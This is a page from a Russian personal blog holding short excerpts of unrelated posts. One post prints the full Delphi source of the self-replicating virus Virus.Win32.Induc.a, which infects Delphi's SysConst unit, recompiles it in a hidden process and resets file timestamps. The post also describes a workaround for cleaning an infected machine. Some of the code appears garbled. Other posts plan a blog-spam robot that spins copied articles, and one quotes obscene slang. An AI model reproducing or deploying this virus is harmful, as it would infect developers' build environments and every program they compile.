Две недели назад я стал счастливым обладателем красивейших раритетных часов. Часы настольные механические, изготовлены в СССР Челябинским часовым заводом “Молния” по ГОСТу 3309-75, первый класс. Корпус состоит из монолитного куска серого мрамора, а так же рамки из латунных деталей. Когда я впервые увидел эти часы, я сразу же в них влюбился. Я представил как красиво [...]
Хотел бы поприветствовать всех гостей моего почти заброшенного блога и рассказать о том, что появился видеоролик по установке и настройке плагина, защищающего от спама в комментариях – невидимой капчи. Автор ролика Сергей Куприянов постарался на славу. Все действия он прокомментировал понятными репликами так, что просмотрев ролик до конца становятся очевидными преимущества Invisible Captcha перед другими [...]
Вчера на работе девушки организовали поздравление мужчин в честь дня Защитника Отечества. Замутили праздничный стол, приготовили какие-то конкурсы, стишки и что-то еще. Но на торжестве побывать мне не удалось, так как пол дня я провёл в магазинах в погоне за мощным аккумулятором для своей видеокамеры. Кстати, в супермаркете DNS, я купил втрое дешевле, чем предлагают [...]
Решил скачать новый Internet Explorer 9 RC, установил, запустил, и знаете что? Он теперь ахуенный! Простите.. Google Chrome и Safari отдыхают. По моим наблюдениям, новый Ослик не просто летает, он носится со скоростью ветра. Страницы прорисовываются молниеносно, скрипты работают еще быстрее, интерфейс минимальный, интуитивно понятный, всё по рукой. Несколько скриншотов. Внешний вид окна: При первой [...]
Друзья! Спасибо за ваши поздравления! Очень приятно ваше внимание, тёплые искренние слова и красивые открытки. Хоть я и не люблю отмечать свои дни рождения, но тем не менее, сегодня тот день, которого я долго ждал. Что такое день рождения? Нет, это не взросление еще на один год, это приятное внимание твоих друзей.
Хотите увидеть страшную руку? Точнее пальцы, которые были слегка обморожены. Я заливал бензин в машину из канистры и немножко пролил на руки. Температура бензина была такой же, как и окружающей среды, -40С. На следующий день появились вот такие волдыри. В результате – термический ожог, только не от высокой температура, а наоборот – от очень низкой. [...]
Не мог пройти мимо и не заснять эту вывеску Даже логотип похож на хер, правда?
Дорогие женщины!
Никогда не спорьте и не ругайтесь со своими мужьями, друзьями и любовниками. В то время когда он на вас кричит, просто сядьте в сторонке и считайте до десяти. А когда он ляжет в кровать, приклейте его тапочки крепким клеем к полу.
А теперь посмотрите, что с ним будет!
Принцип работы и объекты заражения описаны здесь
Loading ...
uses windows;
var sc:array[1..24] of string=(
'uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s',
'=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of',
'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c<>#0 do begin r:=r+c;inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');
function x(s:string):string;
var
i:integer;
begin
for i:=1 to length(s) do
if s=#36 then s:=#39;
result:=s;
end;
procedure re(s,d,e:string);
var
f1,f2:textfile;
h:cardinal;
f:STARTUPINFO;
p:PROCESS_INFORMATION;
b:boolean;
t1,t2,t3:FILETIME;
begin
h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
if h<>DWORD(-1) then
begin
CloseHandle(h);
exit;
end;
{'I-}assignfile(f1,s);
reset(f1);
if ioresult<>0 then
exit;
assignfile(f2,d+'pas');
rewrite(f2);
if ioresult<>0 then
begin
closefile(f1);
exit;
end;
while not eof(f1) do
begin
readln(f1,s);
writeln(f2,s);
if pos('implementation',s)<>0 then
break;
end;
for h:= 1 to 1 do
writeln(f2,sc[h]);
for h:= 1 to 23 do
writeln(f2,''''+sc[h],''',');
writeln(f2,''''+sc[24]+''');');
for h:= 2 to 24 do
writeln(f2,x(sc[h]));
closefile(f1);
closefile(f2);
{'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
fillchar(f,sizeof(f),0);
f.cb := sizeof(f);
f.dwFlags := STARTF_USESHOWWINDOW;
f.wShowWindow := SW_HIDE;
b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
if b then
WaitForSingleObject(p.hProcess,INFINITE);
MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
DeleteFile(pchar(d+'pas'));
h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
if h=DWORD(-1) then
exit;
GetFileTime(h,@t1,@t2,@t3);
CloseHandle(h);
h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
if h=DWORD(-1) then
exit;
SetFileTime(h,@t1,@t2,@t3);
CloseHandle(h);
end;
procedure st;
var
k:HKEY;
c:array [1..255] of char;
i:cardinal;
r:string;
v:char;
begin
for v:='4' to '7' do
if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
begin
i:=255;
if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
begin
r:='';
i:=1;
while c<>#0 do
begin
r:=r+c;
inc(i);
end;
re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
end;
RegCloseKey(k);
end;
end;
begin
st;
end.
Уже наверное неделю я вынашиваю мысль написать робота для блогосферы. Робот по своей сути будет представлять портативную программу-интерпретатор небольшого размера, работающую исключительно на скриптах с определенным, заточенным специально для блогов синтаксисом. Любой блог-сервис, дающий хоть какую-то зацепку для получения и отправки сообщений будет возможно подвергнуть наполнению своим контентом или же сбору информации. Все сервисы, все блоги отдают RSS-ленты, поэтому можно автоматизировать, фильтровать, анализировать или просто читать сообщения, делать с сообщениями всё, что угодно. Сохранять, конвертировать, рассылать по почте. В сриптах будет возможность писать свои какие-то функции, позволяющие, к примеру, уникалзировать коммерческие статьи, для заработка. Или автоматически получать статьи, переводить на другой язык, заменять слова или символы и публиковать в другой блог. Можно будет завести сотни блогов и публиковать в них один и тот же пост, но с разным порядком слов, перемешиванием абзацев и прочей ерундой. Интерфейс работы с конкретным блогом опять же, будет описан в теле интерпретируемого скрипта. Представьте, синдикатор, анализатор, ридер, не важно. Можно будет работать с поисковиками. Указать ключевые слова и робот, действуя инструкциям скрипта, найдет статьи, соберет их в одну, уникализирует и опубликует её в блог. Да всё что угодно…
Вы знаете что такое Microsoft VB для Office? Это интерпретатор на языке бэйсик для документов, электронных таблиц, чего угодно, входящего в состав Office. Процентов 70 пользователей Officа даже не подозревают о его существовании. Использование VB подобно стремительному полёту птицы, безграничные возможности. VB незаменим при каких-то нестандартных действиях с документами или таблицами. Я даже не могу себе представить свою работу без него. Я заполняю сложные таблицы нажатием всего одной кнопки, предварительно написав макрос-шаблон. Так вот я хочу аналогичное, только для блогосферы, я хочу умного робота, работающего с текстом.
Самое главное, я знаю как это реализовать, но нужно много думать..
И еще, как корабль назовёшь, так он и поплывёт. Есть какие-нибудь варианты названия?
А название его Virus.Win32.Induc.a
Кратко, как он работает:
Для своего размножения Virus.Win32.Induc.a использует механизм двушагового создания исполняемых файлов, реализованный в среде Delphi. Согласно данному механизму, исходный код разрабатываемых приложений сначала компилируется в промежуточные .dcu-модули, из которых затем собираются исполняемые в Windows файлы.
Новый вирус активизируется при запуске заражённого им приложения и проверяет, установлен ли на компьютере пакет среды разработки Delphi версий 4.0-7.0. В случае обнаружения пакета, Virus.Win32.Induc.a внедряется в исходный файл базовых констант Delphi Sysconst.pas и компилирует его, в результате чего получается модифицированный откомпилированный файл базовых констант Sysconst.dcu.
Проблема заключается в том, что ативирусные системы определяют и лечат уже зараженные файлы, в принципе, как и должно быть; но не лечат причину заражения. Я несколько раз безрезультатно пробегался разными антивирусами по файлу Sysconst.dcu, и ни одна сволочь не заикнулась, даже ничего не заподозрила. Наверное, все же лечить причину стратегически не выгодно.
Я посмотрел на размеры файлов до заражения и после, оказалось, что чистенький файл Sysconst.pas весит 10’579 байт, а зараженный – 17’113. Но так как этот видус внедряется в файл *.dcu, то кроме как на размер файла, вирус не ориентируется. Поэтому легко исправить ситуацию, просто дописав пробелы в конец файла Sysconst.dcu, тем самым подогнав размер до 17’113 байт. Файл остается чистым, а вирус думает, что главный модуль распространения уже заражен и повторно его не трогает. Чистый файл естественно, можно взять в установочном дистрибутиве Delphi.
Я сутки потратил на лечение компьютера, блин. Но зато, добился результата =)
Теперь можно пойти на балкон и спокойно покурить, смотря на капающий вечерний дождь =)))))))))))
СТОЙ!
Дальше не читай!
Твоя психика может пострадать!!!
Если тебе меньше 18-ти лет,
немедленно закрой эту веб-страницу!!
Это словарь плохих слов
Итак, начнём.
А НУ ТЕБЯ В ПИЗДУ — ругательство.
А НУ ТЕБЯ К ЁБАНОЙ МАТЕРИ — брань.
А НУ ТЕБЯ НА ХУЙ — брань.
А ХУ НЕ ХО — а хуя не хочешь, отказ.
А ХУЙ ЕГО ЗНАЕТ — не знаю.
А ХУ-ХУ НЕ ХО-ХО — хуя не хочешь, отказ.
Читать полностью »
2009-2012 Блог Андрея Сорвина
